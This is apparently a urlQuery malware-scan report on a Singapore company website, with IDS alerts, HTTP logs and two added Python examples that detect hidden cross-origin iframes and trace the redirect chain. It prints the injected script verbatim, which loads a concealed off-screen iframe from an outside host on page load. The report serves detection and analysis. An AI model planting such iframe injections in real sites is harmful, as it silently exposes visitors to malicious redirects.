Overview

URL: http://europlast.com.sg/
IP: 203.76.172.87
ASN: AS45470 8 to Infinity Pte Ltd
Location: Singapore
Report completed: 2012-10-23 10:51:55 CET
urlQuery Alerts: Detected malicious iframe injection


Settings

User agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer:
Adobe Reader: 8.0
Java: 1.6.0_26


Intrusion Detection Systems

Suricata w/ Emerging Threats Pro
Timestamp            Source IP      Destination IP   Severity  Alert
2012-10-23 10:51:21  203.76.172.87  urlQuery Client  1         ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 3)
Snort w/ Sourcefire VRT: No alerts detected


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 203.76.172.87

Date                 Alerts / IDS  URL                                        IP
2013-02-11 14:55:57  2 / 4         http://www.ajsmanpower.com/Location.php    203.76.172.87
2013-02-10 13:54:34  2 / 4         http://www.ajsmanpower.com/Location.php    203.76.172.87
2013-02-05 18:07:17  2 / 3         http://www.ajsmanpower.com/Location.php    203.76.172.87
2013-01-18 09:26:36  0 / 1         http://achieveglobal.com.tw                203.76.172.87
2013-01-15 15:31:52  0 / 0         http://www.mugigae.com/staging             203.76.172.87
2013-01-03 15:56:59  0 / 0         http://www.bluetangerine.biz               203.76.172.87

Last 6 reports on ASN: AS45470 8 to Infinity Pte Ltd

Date                 Alerts / IDS  URL                                                              IP
2013-02-12 05:04:19  0 / 2         http://8toinfinity.com/?xclzve_Raku4DMWfpz8HRaku3DXgqz8HQZir0    223.25.232.20
2013-02-11 14:55:57  2 / 4         http://www.ajsmanpower.com/Location.php                          203.76.172.87
2013-02-10 14:36:54  1 / 2         http://www.akcmedical.com.sg/aboutus.html                        223.25.232.217
2013-02-10 13:54:34  2 / 4         http://www.ajsmanpower.com/Location.php                          203.76.172.87
2013-02-05 18:07:17  2 / 3         http://www.ajsmanpower.com/Location.php                          203.76.172.87
2013-02-03 06:13:55  1 / 3         http://www.daqcon.com.sg/products.htm                            223.25.232.217

Last 6 reports on domain: europlast.com.sg

Date                 Alerts / IDS  URL                        IP
2012-10-20 20:32:20  1 / 1         http://europlast.com.sg/   203.76.172.87
2012-10-19 20:34:17  1 / 1         http://europlast.com.sg/   203.76.172.87
2012-10-19 02:17:25  1 / 1         http://europlast.com.sg/   203.76.172.87
2012-10-18 03:30:05  1 / 1         http://europlast.com.sg/   203.76.172.87
2012-10-16 03:23:28  1 / 1         http://europlast.com.sg/   203.76.172.87
2012-10-13 07:47:38  1 / 2         http://europlast.com.sg/   203.76.172.87



JavaScript

Executed Scripts (3)

#2 JavaScript::Script (size: 276, repeated: 1) - Alert detected on script (Severity: 2)

  function frmAdd() {
      var ifrm = document.createElement('iframe');
      ifrm.style.position = 'absolute';
      ifrm.style.top = '-999em';
      ifrm.style.left = '-999em';
      ifrm.src = "http://fenwaywest.com/media/index.php";
      ifrm.id = 'frmId';
      document.body.appendChild(ifrm);
  };
  window.onload = frmAdd;
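
The script above is the whole injection: an iframe is created at page load, pushed far off-screen with absolute positioning, and pointed at a third-party host. A static check for exactly that combination (cross-origin iframe plus concealment styling) is shown below as an added example. It is not code from the urlQuery report, its sandbox, or the compromised site; the INJECTED_SCRIPT string is copied from the report, and the benign YouTube-style embed used as a control is constructed.

```python
"""Static check for the hidden-iframe injection this urlQuery report flags.

Added example, not part of the urlQuery report or its tooling. A hit needs two
things together: an iframe src on a host other than the page's own, and a
concealment marker (large negative top/left, zero size, display:none or
visibility:hidden) in the same snippet.
"""
import re
from urllib.parse import urlparse

# Copied from the report above (the injected script as captured).
INJECTED_SCRIPT = """
function frmAdd() {
    var ifrm = document.createElement('iframe');
    ifrm.style.position = 'absolute';
    ifrm.style.top = '-999em';
    ifrm.style.left = '-999em';
    ifrm.src = "http://fenwaywest.com/media/index.php";
    ifrm.id = 'frmId';
    document.body.appendChild(ifrm);
};
window.onload = frmAdd;
"""

# Constructed control: cross-origin but visible, so it must not be flagged.
BENIGN_EMBED = '<iframe width="560" height="315" src="https://www.youtube.com/embed/abc123"></iframe>'

# Concealment markers seen in injected iframes: huge negative offsets,
# zero dimensions, or CSS hiding. Written to match both inline-style JS
# ("top = '-999em'") and HTML/CSS ("top:-9999px").
OFFSCREEN = re.compile(r"\b(top|left)\s*[:=]\s*['\"]?\s*-\d{2,}", re.I)
ZERO_SIZE = re.compile(r"\b(width|height)\s*[:=]\s*['\"]?\s*0(?:px)?['\"]?(?![\w.%])", re.I)
HIDDEN = re.compile(r"display\s*[:=]\s*['\"]?\s*none|visibility\s*[:=]\s*['\"]?\s*hidden", re.I)

# iframe targets, whether set as an HTML attribute or assigned via .src in JS.
IFRAME_SRC = re.compile(
    r"(?:<iframe[^>]*?\ssrc\s*=\s*|\.src\s*=\s*)['\"]((?:https?:)?//[^'\"]+)['\"]", re.I)


def same_site(host: str, page_host: str) -> bool:
    """True when the iframe host is the page's host or a sub/parent domain of it."""
    return host == page_host or host.endswith("." + page_host) or page_host.endswith("." + host)


def scan(content: str, page_url: str) -> list:
    """Return one finding per concealed, cross-origin iframe src; [] if none."""
    page_host = (urlparse(page_url).hostname or "").lower()
    # Concealment is checked over the whole snippet: with the createElement()
    # pattern the style assignments sit on separate lines from the src assignment.
    concealed = bool(OFFSCREEN.search(content) or ZERO_SIZE.search(content) or HIDDEN.search(content))
    findings = []
    for m in IFRAME_SRC.finditer(content):
        src = m.group(1)
        host = (urlparse(src).hostname or "").lower()
        if host and concealed and not same_site(host, page_host):
            findings.append({"src": src, "host": host,
                             "reason": "cross-origin iframe with concealment styling"})
    return findings


if __name__ == "__main__":
    for hit in scan(INJECTED_SCRIPT, "http://europlast.com.sg/"):
        print("SUSPICIOUS:", hit)
    print("benign embed:", scan(BENIGN_EMBED, "http://example.com/"))
```

Run over the captured script with the page URL from the report, this returns a single finding for fenwaywest.com; the visible YouTube-style embed returns nothing, and so does the same script with the iframe pointed back at europlast.com.sg. The file-level concealment check is deliberately coarse (a page with one hidden first-party iframe and one visible third-party iframe would be flagged), so treat hits as triage leads, not verdicts.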

Executed Evals (0)


Executed Writes (1)

#1 JavaScript::Write (size: 218, repeated: 1)

<embed width="900" height="427" src="flash/europlast.swf" quality="high" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" > </embed>


HTTP Transactions (16)


Request / Response
GET / HTTP/1.1

Host: europlast.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html
Content-Length: 3433
Content-Location: http://europlast.com.sg/index.html
Last-Modified: Mon, 08 Oct 2012 17:33:15 GMT
Accept-Ranges: bytes
Etag: "c035c5ff7aa5cd1:325ad"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 23 Oct 2012 08:51:16 GMT
GET /css/reset.css HTTP/1.1

Host: europlast.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://europlast.com.sg/
HTTP/1.1 200 OK

Content-Type: text/css
Content-Length: 1068
Last-Modified: Wed, 27 Jul 2011 11:41:55 GMT
Accept-Ranges: bytes
Etag: "6c7dbb2f524ccc1:325ad"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 23 Oct 2012 08:51:17 GMT
GET /images/logo.ico HTTP/1.1

Host: europlast.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/x-icon
Content-Length: 3415
Last-Modified: Wed, 27 Jul 2011 11:41:57 GMT
Accept-Ranges: bytes
Etag: "56d4b530524ccc1:325ad"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 23 Oct 2012 08:51:17 GMT
GET /css/main.css HTTP/1.1

Host: europlast.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://europlast.com.sg/
HTTP/1.1 200 OK

Content-Type: text/css
Content-Length: 3151
Last-Modified: Wed, 27 Jul 2011 11:41:54 GMT
Accept-Ranges: bytes
Etag: "9284202f524ccc1:325ad"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 23 Oct 2012 08:51:17 GMT
GET /Scripts/AC_RunActiveContent.js HTTP/1.1

Host: europlast.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://europlast.com.sg/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Content-Length: 9100
Last-Modified: Mon, 08 Oct 2012 17:34:19 GMT
Accept-Ranges: bytes
Etag: "d474c9257ba5cd1:325ad"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 23 Oct 2012 08:51:17 GMT
GET /images/bg.jpg HTTP/1.1

Host: europlast.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://europlast.com.sg/css/main.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Content-Length: 577
Last-Modified: Wed, 27 Jul 2011 11:41:53 GMT
Accept-Ranges: bytes
Etag: "aa647e2e524ccc1:325ad"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 23 Oct 2012 08:51:18 GMT
GET /images/menu_bot.png HTTP/1.1

Host: europlast.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://europlast.com.sg/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Content-Length: 4798
Last-Modified: Wed, 27 Jul 2011 11:42:06 GMT
Accept-Ranges: bytes
Etag: "bc75d36524ccc1:325ad"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 23 Oct 2012 08:51:18 GMT
GET /images/menu.png HTTP/1.1

Host: europlast.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://europlast.com.sg/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Content-Length: 5789
Last-Modified: Wed, 27 Jul 2011 11:42:08 GMT
Accept-Ranges: bytes
Etag: "960f836524ccc1:325ad"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 23 Oct 2012 08:51:18 GMT
GET /images/logo.jpg HTTP/1.1

Host: europlast.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://europlast.com.sg/css/main.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Content-Length: 33183
Last-Modified: Wed, 27 Jul 2011 11:42:08 GMT
Accept-Ranges: bytes
Etag: "e4724b37524ccc1:325ad"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 23 Oct 2012 08:51:18 GMT
GET /images/index.jpg HTTP/1.1

Host: europlast.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://europlast.com.sg/css/main.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Content-Length: 112692
Last-Modified: Wed, 27 Jul 2011 11:41:58 GMT
Accept-Ranges: bytes
Etag: "5a426631524ccc1:325ad"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 23 Oct 2012 08:51:18 GMT
GET /flash/europlast.swf HTTP/1.1

Host: europlast.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://europlast.com.sg/
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Content-Length: 347103
Last-Modified: Wed, 27 Jul 2011 11:51:56 GMT
Accept-Ranges: bytes
Etag: "28ad9095534ccc1:325ad"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 23 Oct 2012 08:51:19 GMT
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1

Host: fpdownload2.macromedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/xml
Server: Apache
Last-Modified: Wed, 03 Oct 2012 19:48:11 GMT
Etag: "289dff-26c-4cb2ceb2654c0"
Accept-Ranges: bytes
Content-Length: 620
Date: Tue, 23 Oct 2012 08:51:26 GMT
Connection: keep-alive
GET /media/index.php HTTP/1.1

Host: fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://europlast.com.sg/
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Date: Tue, 23 Oct 2012 08:51:27 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.2.17
Set-Cookie: advid=76445; expires=Wed, 24-Oct-2012 08:51:27 GMT
Location: http://google.com
Content-Length: 0
Connection: close
GET / HTTP/1.1

Host: google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://europlast.com.sg/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 301 Moved Permanently

Content-Type: text/html; charset=UTF-8
Location: http://www.google.com/
Date: Tue, 23 Oct 2012 08:51:28 GMT
Expires: Thu, 22 Nov 2012 08:51:28 GMT
Cache-Control: public, max-age=2592000
Server: gws
Content-Length: 219
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
GET / HTTP/1.1

Host: www.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://europlast.com.sg/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: http://www.google.no/
Cache-Control: private
Set-Cookie: NID=64=NFlDdOa6kZJJy45vCu__cy2O3-rJMNCoPpuVHo0Up1iQ2wvOC796gUqEzh3BS4mLiu8YK7VKc55sQHplenGW8XfSqcLgXgMmIoD0yGMNUVRYPsNz_gAzaVYbWoE8pKh2; expires=Wed, 24-Apr-2013 08:51:28 GMT; path=/; domain=.google.com; HttpOnly
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Date: Tue, 23 Oct 2012 08:51:28 GMT
Server: gws
Content-Length: 218
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
GET / HTTP/1.1

Host: www.google.no

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://europlast.com.sg/
Cookie: PREF=ID=833f642268853dd7:U=b8513c9986712345:FF=0:TM=1350344350:LM=1350344355:S=LPv_BMBUAC2Sq6lO; NID=64=wjqq-34sbw8_xZ_YRV2WYW7fIZaBTx0lz0gBHcLIwqanxYn4oQAq91WrZ2VCsF5Rw54OTpvDvPxDz0V1G-U8l77CmHDtBoxYEO7q4xasLAaD13EdvlmdnYljh62qP_E8
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Tue, 23 Oct 2012 08:51:28 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Encoding: gzip
Server: gws
Content-Length: 27525
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
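
The last five transactions are the part of the log that matters for triage: the iframe target fenwaywest.com/media/index.php sets an advid cookie and answers 302 to google.com, which then bounces through www.google.com to www.google.no. Reading that chain out of a flat request/response dump by hand is error-prone, so the following added example (not code from urlQuery or the report) parses a dump in the same layout as the one above and follows the Location headers from a starting URL. SAMPLE_DUMP is a trimmed copy of those transactions with most request headers dropped.

```python
"""Rebuild the redirect chain behind the injected iframe from a urlQuery-style
HTTP transaction dump.

Added example, not part of the urlQuery report or its tooling. The parser
accepts the layout the report uses: request line, Host and other request
headers, then the status line and response headers, with blank lines allowed.
"""
import re
from urllib.parse import urljoin, urlparse

# Trimmed copy of the fenwaywest.com -> google.com transactions in the report.
SAMPLE_DUMP = """GET /media/index.php HTTP/1.1

Host: fenwaywest.com

Referer: http://europlast.com.sg/
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Set-Cookie: advid=76445; expires=Wed, 24-Oct-2012 08:51:27 GMT
Location: http://google.com
Content-Length: 0
GET / HTTP/1.1

Host: google.com

HTTP/1.1 301 Moved Permanently

Location: http://www.google.com/
GET / HTTP/1.1

Host: www.google.com

HTTP/1.1 302 Found

Location: http://www.google.no/
GET / HTTP/1.1

Host: www.google.no

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
"""

REQUEST_LINE = re.compile(r"^(GET|POST|HEAD) (\S+) HTTP/1\.[01]\s*$")
STATUS_LINE = re.compile(r"^HTTP/1\.[01] (\d{3})\b")


def normalize(url: str) -> str:
    """Canonical lookup key: lowercase host, '/' for an empty path, query kept."""
    p = urlparse(url)
    return f"{p.scheme}://{p.netloc.lower()}{p.path or '/'}" + (f"?{p.query}" if p.query else "")


def parse_transactions(dump: str) -> list:
    """One dict per request/response pair: url, status, lowercased response headers."""
    txs, cur, in_response = [], None, False
    for line in dump.splitlines():
        m = REQUEST_LINE.match(line)
        if m:                                   # a new request starts a transaction
            cur = {"path": m.group(2), "host": "", "status": None, "headers": {}}
            txs.append(cur)
            in_response = False
            continue
        if cur is None or not line.strip():
            continue
        m = STATUS_LINE.match(line)
        if m:                                   # status line switches to response headers
            cur["status"] = int(m.group(1))
            in_response = True
            continue
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        if in_response:
            cur["headers"][name] = value
        elif name == "host":
            cur["host"] = value
    for t in txs:
        t["url"] = normalize(f"http://{t['host']}{t['path']}")
    return txs


def redirect_chain(txs: list, start_url: str, limit: int = 10) -> list:
    """Follow Location headers from start_url through the recorded transactions.

    Returns [(url, status), ...]; stops at a non-3xx, an unrecorded hop, or `limit`.
    """
    by_url = {t["url"]: t for t in txs}
    chain, url = [], normalize(start_url)
    while url in by_url and len(chain) < limit:
        t = by_url[url]
        chain.append((url, t["status"]))
        location = t["headers"].get("location")
        if not (t["status"] and 300 <= t["status"] < 400 and location):
            break
        url = normalize(urljoin(url, location))   # Location may be relative
    return chain


if __name__ == "__main__":
    hops = redirect_chain(parse_transactions(SAMPLE_DUMP), "http://fenwaywest.com/media/index.php")
    for url, status in hops:
        print(status, url)
```

On the sample this yields the four hops 302, 301, 302, 200 ending at www.google.no, with the advid cookie available on the first hop's response headers. The chain ending at a search engine is what the sandbox recorded at scan time; nothing in the report says what /media/index.php returns to other visitors, so a clean rescan is not evidence that the redirect host is harmless.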